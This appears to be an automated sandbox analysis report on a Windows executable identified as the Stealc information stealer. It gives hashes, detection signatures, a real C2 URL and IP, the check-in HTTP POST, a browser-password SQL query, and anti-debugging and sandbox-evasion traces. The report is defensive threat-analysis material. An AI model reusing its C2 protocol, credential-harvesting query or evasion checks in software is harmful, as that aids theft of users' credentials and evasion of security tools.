
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1520474
MD5: 219066ac9697d1cdeb536bc4ea74c123
SHA1: a8f5b34c40766dbf7ae0140c581dc23c5d75918f
SHA256: ce8350a94bca9e1e552275527845443db7c0d0159e34e53220bfe38fed03e041
Tags: exe, Stealc, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 1216 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 219066AC9697D1CDEB536BC4EA74C123)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Extracted malware configuration: {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Yara matches (Source | Rule | Description | Author):

Source: dump.pcap | Rule: JoeSecurity_Stealc_1 | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000003.2045915798.00000000052E0000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: Process Memory Space: file.exe PID: 1216 | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: Process Memory Space: file.exe PID: 1216 | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 0.2.file.exe.940000.0.unpack | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security

No Sigma rule has matched

Suricata IDS alerts:

Timestamp: 2024-09-27T11:26:07.373709+0200 | SID: 2044243 | Severity: 1 | Classtype: Malware Command and Control Activity Detected | Source IP: 192.168.2.5 | Source Port: 49704 | Destination IP: 185.215.113.37 | Destination Port: 80 | Protocol: TCP


                AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.940000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00949AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00947240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00949B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00958EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00954910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00954570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094F68A FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00953EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----KFBAECBAEGDGDHIEHIJJ
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data (ASCII; the hex dump of the same 211 bytes is not reproduced):
    ------KFBAECBAEGDGDHIEHIJJ
    Content-Disposition: form-data; name="hwid"

    AE633992F9F51660493485
    ------KFBAECBAEGDGDHIEHIJJ
    Content-Disposition: form-data; name="build"

    save
    ------KFBAECBAEGDGDHIEHIJJ--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00944880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 to 185.215.113.37, same headers and multipart body (hwid, build=save) as the POST request listed above
Source: file.exe, 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2090680717.0000000001615000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2090680717.0000000001615000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/I~
Source: file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php2
Source: file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpW
Source: file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpd
Source: file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpo?
Source: file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/n

                System Summary

Source: file.exe | Static PE information: section name: (special characters, not printable)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (special characters, not printable)
Source: C:\Users\user\Desktop\file.exe | Code functions: 0_2_00CD686F, 0_2_00C8007B, 0_2_00CE2980, 0_2_00D0BA07, 0_2_00D083F6, 0_2_00CFE3AB, 0_2_00D15B68, 0_2_00BB5C61, 0_2_00C5141F, 0_2_00D0D5C0, 0_2_00D035E1, 0_2_00BFB5DF, 0_2_00C2056B, 0_2_00CBCD12, 0_2_00BF3E99, 0_2_00CFFEB7, 0_2_00D09E54, 0_2_00CD2642, 0_2_00BC77A9, 0_2_00D0EFFD, 0_2_00C1270D
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 009445C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: pypkqjdw ZLIB complexity 0.9947862861570248
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00958680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00953720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\6MDZQ8MF.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT origin_url, username_value, password_value FROM logins;
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Sections loaded: apphelp.dll, winmm.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1828864 > 1048576
Source: file.exe | Static PE information: Raw size of pypkqjdw is bigger than: 0x100000 < 0x198600

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.940000.0.unpack; section rights in the unpacked image: (unnamed):EW; .rsrc:W; .idata:W; (unnamed):EW; pypkqjdw:EW; fqpfwnfj:EW; .taggant:EW vs the on-disk file: (unnamed):ER; .rsrc:W; .idata:W; (unnamed):EW; pypkqjdw:EW; fqpfwnfj:EW; .taggant:EW
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00959860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1caa0f should be: 0x1cca40
Source: file.exe | Static PE information: section name: (special characters, not printable)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (special characters, not printable)
Source: file.exe | Static PE information: section name: pypkqjdw
Source: file.exe | Static PE information: section name: fqpfwnfj
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB88C2 push 45D11B5Ch; mov dword ptr [esp], ebx (at 0_2_00CB88F4)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB88C2 push 1B3F5D88h; mov dword ptr [esp], edx (at 0_2_00CB89CE)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB88C2 push 17EE9B89h; mov dword ptr [esp], ecx (at 0_2_00CB89E3)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB88C2 push ebp; mov dword ptr [esp], edx (at 0_2_00CB8A60)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB88C2 push 7ACF34A2h; mov dword ptr [esp], ecx (at 0_2_00CB8A96)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB88C2 push eax; mov dword ptr [esp], ebp (at 0_2_00CB8AA2)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DAC8C4 push 3D0B2B3Ch; mov dword ptr [esp], esp (at 0_2_00DAC93D)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D860FD push 5CEB16B2h; mov dword ptr [esp], ebx (at 0_2_00D8613D)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D860FD push 3919A446h; mov dword ptr [esp], eax (at 0_2_00D8617F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CAF8FE push ebp; mov dword ptr [esp], edi (at 0_2_00CAF9AC)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CAF8FE push ecx; mov dword ptr [esp], E60C94C7h (at 0_2_00CAF9E7)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DD309C push edi; mov dword ptr [esp], ebp (at 0_2_00DD30D6)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DD309C push ecx; mov dword ptr [esp], 5FF79B79h (at 0_2_00DD30E7)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D2D885 push edi; mov dword ptr [esp], esi (at 0_2_00D2D8A0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C38099 push edx; mov dword ptr [esp], 12A2CCC0h (at 0_2_00C380DB)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C38099 push 37E74602h; mov dword ptr [esp], eax (at 0_2_00C3813C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DE0085 push ebp; mov dword ptr [esp], ecx (at 0_2_00DE00AB)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DE0085 push 4785A463h; mov dword ptr [esp], ebp (at 0_2_00DE00C8)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D4485E push 5DD3F517h; mov dword ptr [esp], eax (at 0_2_00D448A4)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D7B859 push ebp; mov dword ptr [esp], ebx (at 0_2_00D7B896)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6F059 push ebp; mov dword ptr [esp], esi (at 0_2_00D6F067)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0095B035 push ecx; ret (at 0_2_0095B048)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D71076 push ebx; mov dword ptr [esp], edx (at 0_2_00D71098)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CD686F push 65287EA0h; mov dword ptr [esp], ebx (at 0_2_00CD689D)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CD686F push 5DEB55EAh; mov dword ptr [esp], edx (at 0_2_00CD69DD)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CD686F push edx; mov dword ptr [esp], esi (at 0_2_00CD6A83)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CD686F push ebx; mov dword ptr [esp], ebp (at 0_2_00CD6ADB)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CD686F push edx; mov dword ptr [esp], esp (at 0_2_00CD6ADF)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FD304D push ebp; mov dword ptr [esp], 67FEB9D0h (at 0_2_00FD30CF)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FD304D push edi; mov dword ptr [esp], esi (at 0_2_00FD310B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FD304D push 6A8AA740h; mov dword ptr [esp], ebx (at 0_2_00FD3148)
Source: file.exe | Static PE information: section name: pypkqjdw entropy: 7.954735554227634

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-13407)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: paired rdtsc reads at CFDEB7 -> CFDEDD, CFDEDD -> CFDEE1, D14F67 -> D14F76, D14F76 -> D14FAF, D15272 -> D15278, D17D81 -> D17D85, D17D85 -> D17D8B, D17D8B -> D17DA0, D17DA0 -> D17E5F, D17E5F -> D17E63, D17E63 -> D17ED9, D17F37 -> D17F3D, D17F3D -> D17F51, D17F51 -> D17F6A (the junk-instruction traces between each pair are not reproduced)
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17F6A second address: D17F6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17F6E second address: D17F97 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F0D34B70904h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17F97 second address: D17F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17F9B second address: D17F9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17F9F second address: D18027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pop eax 0x00000008 mov dword ptr [ebp+122D3672h], ebx 0x0000000e or dword ptr [ebp+122D181Eh], ebx 0x00000014 push 00000003h 0x00000016 or edi, 58CB06EAh 0x0000001c push 00000000h 0x0000001e mov edx, dword ptr [ebp+122D3815h] 0x00000024 push 00000003h 0x00000026 mov di, dx 0x00000029 push C8BB27B5h 0x0000002e push eax 0x0000002f jl 00007F0D344F4ABCh 0x00000035 pop eax 0x00000036 xor dword ptr [esp], 08BB27B5h 0x0000003d push 00000000h 0x0000003f push edi 0x00000040 call 00007F0D344F4AB8h 0x00000045 pop edi 0x00000046 mov dword ptr [esp+04h], edi 0x0000004a add dword ptr [esp+04h], 00000014h 0x00000052 inc edi 0x00000053 push edi 0x00000054 ret 0x00000055 pop edi 0x00000056 ret 0x00000057 mov dword ptr [ebp+12447C8Fh], esi 0x0000005d lea ebx, dword ptr [ebp+12449CB5h] 0x00000063 or dword ptr [ebp+122D1969h], ebx 0x00000069 push eax 0x0000006a pushad 0x0000006b push eax 0x0000006c jmp 00007F0D344F4ABFh 0x00000071 pop eax 0x00000072 push eax 0x00000073 push edx 0x00000074 push edx 0x00000075 pop edx 0x00000076 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D18074 second address: D1809B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0D34B708F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov esi, dword ptr [ebp+122D38C5h] 0x00000013 push 00000000h 0x00000015 sub dx, 66E7h 0x0000001a push CEBD4130h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1809B second address: D1809F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1809F second address: D180A9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D180A9 second address: D180DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4ABFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 3142BF50h 0x00000010 mov di, 1AB7h 0x00000014 push 00000003h 0x00000016 sbb dx, 8165h 0x0000001b push 00000000h 0x0000001d push 00000003h 0x0000001f mov cl, bl 0x00000021 push 8ED3D7DFh 0x00000026 push eax 0x00000027 push edx 0x00000028 push ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D180DE second address: D180E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D180E3 second address: D1813E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 312C2821h 0x0000000f mov si, ax 0x00000012 lea ebx, dword ptr [ebp+12449CC0h] 0x00000018 xchg eax, ebx 0x00000019 jnp 00007F0D344F4ACAh 0x0000001f jmp 00007F0D344F4AC4h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 jmp 00007F0D344F4AC2h 0x0000002d jmp 00007F0D344F4AC1h 0x00000032 popad 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1813E second address: D18144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37978 second address: D3797C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3797C second address: D37999 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B708FFh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F0D34B708F6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37999 second address: D379B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC0h 0x00000007 je 00007F0D344F4AB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37CD5 second address: D37CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37E44 second address: D37E50 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0D344F4AB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37E50 second address: D37E55 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37FBC second address: D37FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37FC2 second address: D37FD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 popad 0x00000009 pushad 0x0000000a jnl 00007F0D34B708F8h 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37FD7 second address: D37FE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0D344F4AB6h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38121 second address: D3812A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D384F8 second address: D38502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0D344F4AB6h 0x0000000a rdtsc
